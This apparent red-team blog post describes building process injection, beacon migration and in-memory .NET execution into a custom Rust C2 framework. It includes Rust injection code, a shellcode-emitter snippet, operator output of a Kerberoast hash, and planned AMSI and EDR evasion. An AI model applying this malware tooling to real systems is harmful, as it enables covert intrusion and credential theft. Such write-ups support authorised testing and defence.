Back to Home
Red Team

Custom C2 Development #3 — Implementing Process Injection and execute-assembly in Rust

CloakCat

Author

CloakCat

Time

8 min read

Read by

15

Custom C2 Development #3 — Implementing Process Injection and execute-assembly in Rust

The CloakCat vs Cobalt Strike analysis in the previous post surfaced two critical gaps: no process injection, and no execute-assembly. Without these, real red team workflows are fundamentally broken — every post-ex capability runs inside the agent process, and you can't execute .NET tooling in-memory. These were prerequisites before CloakCat could be used for lab work. Phase 10 and Phase 11 were implemented back-to-back.


Why These Two Were Urgent

The previous post's gap analysis made two things impossible to ignore: no process injection and no execute-assembly.

The operational impact is concrete. Without process injection, every post-ex capability runs inside the agent process — when the agent dies, everything dies with it. Without execute-assembly, there's no in-memory execution path for .NET tooling. Rubeus, Seatbelt, SharpHound — half the AD attack surface is inaccessible.

These were hard prerequisites for following any realistic lab scenario with CloakCat. Phase 10 (process injection) and Phase 11 (execute-assembly) were implemented consecutively.


Phase 10: Process Injection

Classic Injection — Still Relevant

The most fundamental injection primitive is the one everyone knows:

OpenProcess → VirtualAllocEx → WriteProcessMemory → VirtualProtectEx → CreateRemoteThread

This pattern is well-documented and EDR vendors have been building signatures against it for years. It persists because blocking this API call chain wholesale breaks legitimate software — debuggers, profilers, anti-cheat engines, and Windows system services all use these APIs. What EDRs can do is evaluate whether this combination is executing in a suspicious context. Making that judgment wrong is the operator's job.

The implementation detail that mattered here was W^X compliance. Rather than allocating with PAGE_EXECUTE_READWRITE in a single call, the implementation uses a two-phase approach: allocate with PAGE_READWRITE → copy shellcode → transition to PAGE_EXECUTE_READ via VirtualProtectEx. RWX memory is a standalone IOC — it flags immediately in most EDRs regardless of context.

rust// Allocate RW — writable only
let mem = VirtualAllocEx(process, null(), sc_len,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Copy shellcode
WriteProcessMemory(process, mem, sc_ptr, sc_len, &mut written);

// Transition RW → RX — executable now, no longer writable
VirtualProtectEx(process, mem, sc_len, PAGE_EXECUTE_READ, &mut old);

// Execute
CreateRemoteThread(process, null(), 0, mem, null(), 0, null_mut());

spawn+inject — The Sacrificial Process Pattern

Injecting into an existing process is functional, but the operationally cleaner pattern is spawning a sacrificial process. Create a suspended process via CreateProcessW, inject into it, then resume.

The advantage is straightforward. Injecting into an existing process means the host process's crash takes the implant with it. Inject into explorer.exe and hit a problem — the desktop is gone. A sacrificial process has no blast radius. This is why spawnto configuration was included — operator control over which process gets spawned.

rust// Create process in suspended state
CreateProcessW(exe_path, null_mut(), null(), null(),
    0, CREATE_SUSPENDED, null(), null(), &si, &mut pi);

// Injection (standard chain above)
// ...

// Resume — execution begins
ResumeThread(pi.h_thread);

The default spawnto target is svchost.exe. There are dozens of svchost instances running on any Windows host — one more doesn't stand out. A careful analyst will flag the PPID anomaly (parent should be services.exe, not the agent process), but PPID Spoofing is Phase 14.

migrate — Relocating the Beacon

migrate moves the current beacon into a different process. Mechanically, it injects its own shellcode into a target PID and terminates the originating process.

The scenario is common. Initial access drops the agent into notepad.exe. User closes Notepad — beacon dies. Migrating into a long-running process like svchost.exe or RuntimeBroker.exe fixes the stability problem.


Phase 11: execute-assembly

Why This Matters

The majority of the red team tooling ecosystem is .NET. Rubeus (Kerberos attacks), Seatbelt (host enumeration), SharpHound (BloodHound data collection), Certify (ADCS abuse) — execute-assembly is what lets you run these tools without writing to disk.

execute-assembly Rubeus.exe kerberoast in Cobalt Strike is a single command. Implementing it from scratch requires hosting the CLR (Common Language Runtime) — bootstrapping the .NET runtime inside a process, loading assembly bytes from memory, locating the EntryPoint, and invoking it.

Inline Mode — Direct Execution in the Agent Process

The simplest implementation hosts the CLR inside the agent process itself.

CLRCreateInstance → ICLRMetaHost
    → GetRuntime("v4.0.30319") → ICLRRuntimeInfo
    → GetInterface(ICorRuntimeHost)
    → Start()
    → GetDefaultDomain() → AppDomain
    → Load_3(byte[] assembly) → Assembly
    → get_EntryPoint() → MethodInfo
    → Invoke_3(args)

In Rust, this entire chain is manual COM vtable calls. The windows-sys crate doesn't expose CLR interfaces, so IIDs and CLSIDs need to be defined manually, vtable offsets need to be computed from SDK documentation, and function signatures need to be cast as extern "system" fn(...) pointers.

The failure mode for inline mode is fatal — if the .NET tool throws an unhandled exception, the CLR terminates the process. Beacon and all capabilities go with it. Inline mode is available but gated behind an explicit --inline flag.

spawn+execute — The Operationally Sound Implementation

The approach that's actually usable is spawn+execute. Build on Phase 10's spawn+inject infrastructure: inject CLR-hosting shellcode into a sacrificial process, capture output via Named Pipe.

1. Create Named Pipe (parent holds read end)
2. Spawn sacrificial process (CREATE_SUSPENDED)
3. Inject CLR hosting shellcode + assembly data
4. CreateRemoteThread → child bootstraps CLR + executes assembly
5. Child redirects stdout/stderr to Named Pipe
6. Parent (beacon) reads output from pipe
7. Wait for child termination, clean up

Step 3 is where the complexity concentrates. The injected shellcode needs to be position-independent while simultaneously hosting the entire CLR. What that shellcode does:

Resolve CoInitializeEx from ole32.dll, SafeArray functions from oleaut32.dll, and CLRCreateInstance from mscoree.dll. Initialize COM, bootstrap the CLR, read assembly bytes from the injected data block, copy into a SafeArray, load via AppDomain.Load_3, locate the EntryPoint, and invoke it. Before execution, redirect stdout to the Named Pipe so output flows back to the parent.

Generating this entire sequence as x86_64 position-independent shellcode came out to over 1,200 lines. The approach is pushing machine code bytes into a Vec<u8> with emit helper functions — manageable with the right abstractions.

rust// COM vtable call helper
fn vtcall(code: &mut Vec<u8>, slot: u32) {
    code.extend(&[0x48, 0x8B, 0x01]);  // mov rax, [rcx]
    let off = (slot * 8) as i32;
    code.extend(&[0xFF, 0x90]);          // call [rax + offset]
    code.extend(&off.to_le_bytes());
}

// ICLRMetaHost::GetRuntime (vtable slot 3)
ld_rcx_rsp(code, 0x80);          // this = ICLRMetaHost*
lea_rdx_rbx(code, off.str_v4);   // "v4.0.30319"
lea_r8_rbx(code, off.iid_ri);    // IID_ICLRRuntimeInfo
lea_r9_rsp(code, 0x88);          // &out
vtcall(code, 3);

Invoke Retry on Signature Mismatch

Real .NET tools have varied Main signatures — Main(string[] args) and Main() (no parameters) both exist. If the first Invoke_3 fails on parameter mismatch, the implementation retries with empty parameters.


The Reality of COM Interop in Rust

The biggest time sink across Phase 10 and 11 wasn't Windows API logic — it was COM interop in Rust. In C/C++, header files define COM interfaces and the compiler handles vtable dispatch automatically. In Rust, everything is manual.

IIDs are 16-byte arrays defined by hand. Vtable offsets are pulled from SDK documentation and hardcoded. Function signatures are manually cast to extern "system" fn(...) pointers. Getting ICorRuntimeHost::GetDefaultDomain's vtable slot wrong by one — slot 13 vs 14 — produces a process crash with no diagnostic output.

The WMI COM vtable work in lateral.rs was directly applicable. The pattern is identical — more interfaces, plus SafeArray/BSTR/VARIANT type manipulation added on top. Without that prior work, Phase 11 implementation time would have been significantly longer.


Validation

Process Injection

cl0akcat > agents
[corp-dc] alive, PID 3412

cl0akcat > inject corp-dc 4568
cl0akcat > agents
[corp-dc] alive, PID 3412
[corp-dc-2] alive, PID 4568    ← new beacon

cl0akcat > spawn corp-dc
cl0akcat > agents
[corp-dc] alive, PID 3412
[corp-dc-3] alive, PID 7890    ← beacon injected into spawnto process

cl0akcat > migrate corp-dc 2048
cl0akcat > agents
[corp-dc] alive, PID 2048      ← PID updated

execute-assembly

cl0akcat > execute-assembly corp-dc ./Rubeus.exe kerberoast
cl0akcat > tail corp-dc
[*] Spawned 'svchost.exe' (PID 6712), assembly executed
[*] Action: Kerberoasting
[*] SPN: MSSQLSvc/sql01.corp.local:1433
[*] Hash: $krb5tgs$23$*svc_sql$corp.local$...

cl0akcat > execute-assembly corp-dc ./Seatbelt.exe -group=all
cl0akcat > tail corp-dc
[*] Spawned 'svchost.exe' (PID 8234), assembly executed
====== AMSIProviders ======
...
====== AntiVirus ======
  Engine: Windows Defender
  ProductEXE: windowsdefender://
...

Known Gaps

To be direct about what's still broken:

AMSI is not bypassed. The moment execute-assembly hosts the CLR, AMSI activates. Running Rubeus against a Defender-enabled target gets caught. Phase 14 will implement AmsiScanBuffer patching — until then, the workaround is either disabling Defender or running an AMSI-patching BOF first.

No Sleep Mask. Injected beacons have plaintext code in memory during sleep. EDR periodic memory scanning will catch this.

CreateRemoteThread is the noisiest injection primitive available. APC injection, thread hijacking, module stomping — none of these are implemented yet. The current technique is among the most well-signatured patterns in EDR detection logic.

PPID anomaly is unresolved. Sacrificial svchost.exe processes spawned by the agent have the agent as their parent. Legitimate svchost instances are parented by services.exe. This is Phase 14's PPID Spoofing work.


Summary

Phase 10 and 11 together added approximately 2,500 lines of code. More than half of that is the CLR-hosting shellcode generation for execute-assembly.

The operational impact of these two phases is significant. Before: shell commands and file operations. After: beacon injection into arbitrary processes, in-memory .NET execution, process migration — actual C2 operational workflow.

The technical foundation required to run real lab scenarios with CloakCat is now in place. The next post covers deploying CloakCat against an actual lab environment.


This is the third post in the CloakCat development series.

Previous: Custom C2 Development #2 — CloakCat vs Cobalt Strike: A Feature Parity Analysis

Comments

Loading comments…

Leave a Comment

Related Posts